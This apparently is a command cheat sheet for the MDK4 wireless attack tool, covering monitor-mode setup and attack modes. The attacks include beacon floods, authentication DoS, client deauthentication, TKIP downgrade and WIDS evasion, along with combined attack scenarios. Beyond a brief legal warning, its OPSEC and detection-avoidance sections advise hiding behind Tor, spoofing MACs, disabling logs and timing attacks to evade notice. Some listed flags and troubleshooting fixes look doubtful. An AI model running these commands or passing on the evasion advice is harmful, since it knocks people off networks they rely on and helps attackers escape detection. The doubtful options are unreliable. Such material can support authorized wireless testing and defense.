MDK4
Installation
Section titled “Installation”# Install dependencies (Ubuntu/Debian)
sudo apt-get install build-essential libpcap-dev aircrack-ng
# Clone and compile MDK4
git clone https://github.com/aircrack-ng/mdk4.git
cd mdk4
make
sudo make install
# Verify installation
mdk4 --versionMonitor Mode Setup
Section titled “Monitor Mode Setup”# Check wireless interfaces
iwconfig
ip link show
# Enable monitor mode on wlan0
sudo airmon-ng start wlan0
# Or manually with iw (creates wlan0mon)
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Verify monitor mode active
iwconfig
# Output should show "Mode:Monitor"
# Disable monitor mode
sudo airmon-ng stop wlan0mon
# Or manually revert
sudo ip link set wlan0 down
sudo iw dev wlan0 set type managed
sudo ip link set wlan0 upBasic Usage
Section titled “Basic Usage”# Help and version info
mdk4 --help
mdk4 --version
# List available attack modes
mdk4 wlan0mon --help
# General syntax
mdk4 <interface> <attack_mode> [options] <target>Attack Modes
Section titled “Attack Modes”Beacon Flood (b)
Section titled “Beacon Flood (b)”Flood network with fake beacons, creating ghost networks and confusing clients.
# Basic beacon flood on all channels
mdk4 wlan0mon b
# Beacon flood with custom SSID file
mdk4 wlan0mon b -f ssid_list.txt
# Flood specific channel
mdk4 wlan0mon b -c 6
# Flood multiple channels
mdk4 wlan0mon b -c 1,6,11
# Set beacon interval (milliseconds)
mdk4 wlan0mon b -i 100
# Specify output interface (if multiple)
mdk4 wlan0mon b -B wlan0monAuthentication DoS (a)
Section titled “Authentication DoS (a)”Flood target with authentication requests, exhausting AP resources.
# Basic authentication DoS
mdk4 wlan0mon a -t <target_BSSID>
# Auth DoS on specific channel
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -c 6
# Flood with custom auth rate (packets/sec)
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -n 100
# Target multiple APs
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66SSID Probing (p)
Section titled “SSID Probing (p)”Broadcast probe requests for networks in a wordlist, testing for hidden SSIDs.
# Probe with SSID list
mdk4 wlan0mon p -f wordlist.txt
# Probe specific SSID
mdk4 wlan0mon p -s "MyNetwork"
# Probe on single channel
mdk4 wlan0mon p -f wordlist.txt -c 6
# Specify probe interval (milliseconds)
mdk4 wlan0mon p -f wordlist.txt -i 50Deauthentication/Disassociation (d)
Section titled “Deauthentication/Disassociation (d)”Force clients to disconnect from target AP.
# Deauth all clients on target AP
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF
# Deauth specific client
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Deauth with custom frame count
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 -n 100
# Deauth on specific channel
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -C 6Michael Shutdown (m)
Section titled “Michael Shutdown (m)”Trigger Michael frame errors to disable TKIP encryption and force downgrade.
# Basic Michael shutdown
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF
# Michael attack on specific client
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Set attack rate
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF -n 100EAPOL Start (e)
Section titled “EAPOL Start (e)”Send EAPOL Start frames to initiate authentication handshakes.
# Basic EAPOL Start flood
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF
# EAPOL with custom source MAC
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -s 00:11:22:33:44:55
# Set EAPOL interval
mdk4 wlan0mon e -t AA:BB:CC:DD:EE:FF -i 50WIDS/IPS Evasion (w)
Section titled “WIDS/IPS Evasion (w)”Exploit WIDS (Wireless Intrusion Detection) by sending fuzzy/malformed frames.
# WIDS confusion mode
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF
# Fuzzy frame generation
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF --fuzzy
# Target specific WIDS sensor
mdk4 wlan0mon w -t AA:BB:CC:DD:EE:FF -c 6Targeting and Filtering
Section titled “Targeting and Filtering”# Target specific AP by BSSID
mdk4 wlan0mon b -t AA:BB:CC:DD:EE:FF
# Target specific client MAC
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66
# Exclude specific BSSID
mdk4 wlan0mon b --bssid-file exclude.txt
# Target by SSID name (if known)
mdk4 wlan0mon d -s "TargetNetwork"
# Multiple targets
mdk4 wlan0mon a -t AA:BB:CC:DD:EE:FF -t 11:22:33:44:55:66 -t 99:88:77:66:55:44Channel Selection and Frequency
Section titled “Channel Selection and Frequency”# Single channel
mdk4 wlan0mon b -c 6
# Multiple channels
mdk4 wlan0mon b -c 1,6,11,36,40,44,48
# All 2.4GHz channels
mdk4 wlan0mon b -c 1-13
# 5GHz UNII bands
mdk4 wlan0mon b -c 36-165
# No channel restriction (all bands)
mdk4 wlan0mon bRate Control and Timing
Section titled “Rate Control and Timing”# Set frame rate (packets per second)
mdk4 wlan0mon b -n 1000
# Millisecond interval between frames
mdk4 wlan0mon b -i 10
# Slow rate for OPSEC
mdk4 wlan0mon b -n 50 -i 100
# Aggressive rate
mdk4 wlan0mon b -n 5000 -i 1MAC Spoofing and Source Control
Section titled “MAC Spoofing and Source Control”# Custom source MAC for beacons
mdk4 wlan0mon b -s 00:11:22:33:44:55
# Random MAC per frame
mdk4 wlan0mon b --random-mac
# Fixed BSSID in beacons
mdk4 wlan0mon b -B AA:BB:CC:DD:EE:FFAdvanced Options
Section titled “Advanced Options”# Verbose output
mdk4 wlan0mon b -v
# Show packet details
mdk4 wlan0mon b -d
# Duration/time limit (seconds)
timeout 300 mdk4 wlan0mon b
# Output to file for analysis
mdk4 wlan0mon b -o attack.log
# Background execution
mdk4 wlan0mon b &OPSEC and Legal Considerations
Section titled “OPSEC and Legal Considerations”Legal Warning
Section titled “Legal Warning”MDK4 performs DoS attacks against wireless networks. Only use on networks you own or have explicit written permission to test. Unauthorized use violates:
- Computer Fraud and Abuse Act (CFAA) in US
- Computer Misuse Act in UK
- Similar laws in most jurisdictions
Operational Security
Section titled “Operational Security”# Use VPN/Tor if testing remote networks (never your home IP)
# Spoof MAC address to avoid tracking
sudo macchanger -r wlan0mon
# Use minimal output to reduce detection
mdk4 wlan0mon b -c 6 > /dev/null
# Disable logging of attacks
mdk4 wlan0mon b --nolog
# Time attacks during high traffic periods
# Launch during peak hours (less suspicious)
# Exit cleanly and restore interface
sudo airmon-ng stop wlan0mon
sudo systemctl restart networkingDetection Avoidance
Section titled “Detection Avoidance”- Vary attack parameters (channels, rates, timing)
- Avoid flooding from single source MAC
- Rotate attack modes to appear as multiple actors
- Do not target production networks during business hours
- Leave adequate gaps between attacks
- Monitor for WIDS alerts during testing
Combined Attack Scenarios
Section titled “Combined Attack Scenarios”# Multi-channel beacon flood with custom SSIDs
mdk4 wlan0mon b -f wordlist.txt -c 1-13 -n 500
# Deauth + beacon flood (run in parallel)
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
mdk4 wlan0mon b -c 6 &
wait
# SSID enumeration + probe analysis
mdk4 wlan0mon p -f wordlist.txt -v
# Michael shutdown before deauth
mdk4 wlan0mon m -t AA:BB:CC:DD:EE:FF &
sleep 5
mdk4 wlan0mon d -t AA:BB:CC:DD:EE:FF &
waitTroubleshooting
Section titled “Troubleshooting”| Issue | Solution |
|---|---|
| ”wlan0mon: No such device” | Run sudo airmon-ng start wlan0 to create monitor interface |
| Attacks fail silently | Check iwconfig for Monitor mode, verify channel, try -v flag |
| High CPU usage | Reduce rate (-n) or interval (-i) values |
| Packets not sending | Disable software encryption: sudo rfkill unblock all |
| Cannot target specific AP | Verify BSSID with sudo airodump-ng wlan0mon first |
| Connection to WIDS/IPS | Use fuzzy mode (w --fuzzy) or vary channels/rates |
Related Tools
Section titled “Related Tools”- aircrack-ng — Full WiFi security suite (airodump, aireplay, airmon)
- hashcat — Password cracking for captured handshakes
- Wireshark — Packet analysis and inspection
- hcxdumptool — Extract hash-mode 22000 from PCAP for hashcat
- hostapd — Create rogue AP for evil twin attacks